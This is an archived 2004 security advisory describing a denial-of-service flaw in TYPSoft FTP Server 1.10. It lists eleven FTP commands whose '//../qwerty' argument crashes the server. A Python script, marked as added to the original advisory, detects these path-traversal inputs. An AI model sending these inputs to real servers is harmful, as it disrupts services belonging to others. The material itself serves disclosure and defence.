[NT] Multiple TYPSoft FTP Server Vulnerabilities (//../qwerty)
From: SecuriTeam (support_at_securiteam.com)
Date: 02/25/04
To: list@securiteam.com Date: 25 Feb 2004 19:22:21 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Multiple TYPSoft FTP Server Vulnerabilities (//../qwerty)
------------------------------------------------------------------------
SUMMARY
<http://www.typsoft.com/> TYPSoft FTP Server is "a fast and easy FTP
server with support to Standard FTP Command, Clean interface, Virtual File
System architecture, ability to resume Download and Upload, IP
Restriction, Login/Quit message, logs, Multi Language and many other
things". The product has been found to contain multiple vulnerabilities
that would allow a remote attacker to initiate a denial of service against
the product.
DETAILS
Vulnerable Systems:
* TYPSoft FTP Server version 1.10
TYPSoft FTP Server can be subjected to a denial of service by sending
standard FTP commands with the parameter "//../qwerty".
Examples:
mkd //../qwerty
xmkd //../qwerty
dele //../qwerty
size //../qwerty
retr //../qwerty
stor //../qwerty
appe //../qwerty
rnfr //../qwerty
rnto //../qwerty
rmd //../qwerty
xrmd //../qwerty
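For detection, the commands listed above can be matched on the FTP control channel. The following is an added example, not part of the original advisory: a Python check that flags the listed commands when their absolute path argument uses ".." to climb above the FTP root, with the advisory's "//" prefix called out separately. The function names and the sample lines are constructed for illustration.

```python
import re

# Path-taking commands the advisory names as affected.
AFFECTED = {"MKD", "XMKD", "DELE", "SIZE", "RETR", "STOR",
            "APPE", "RNFR", "RNTO", "RMD", "XRMD"}

def escapes_root(path):
    """True if '..' segments in an absolute path climb above the root."""
    depth = 0
    for seg in re.split(r"[\\/]+", path):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False

def classify(line):
    """Return (command, reason) for a suspicious command line, else None."""
    parts = line.strip().split(None, 1)
    if len(parts) != 2:
        return None
    cmd, arg = parts[0].upper(), parts[1]
    # Relative arguments depend on the session's working directory,
    # which this sketch does not track, so only absolute ones are judged.
    if cmd not in AFFECTED or arg[0] not in "/\\":
        return None
    if not escapes_root(arg):
        return None
    if arg.startswith("//"):
        return (cmd, "advisory pattern: leading '//' then '..'")
    return (cmd, "'..' climbs above the FTP root")

def scan(lines):
    """Return (line number, command, reason) for every flagged line."""
    return [(n,) + v for n, line in enumerate(lines, 1)
            if (v := classify(line))]

# Constructed sample of control-channel command lines (not real traffic).
SAMPLE = ["USER anonymous", "RETR /pub/readme.txt", "size //../qwerty",
          "MKD /pub/../../x", "DELE ../old.txt", "LIST //../qwerty"]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Only the commands named in the advisory are checked, so the LIST line in the sample is not flagged.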
ADDITIONAL INFORMATION
The information has been provided by <mailto:intuit@linuxmail.org> intuit
e.b..
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.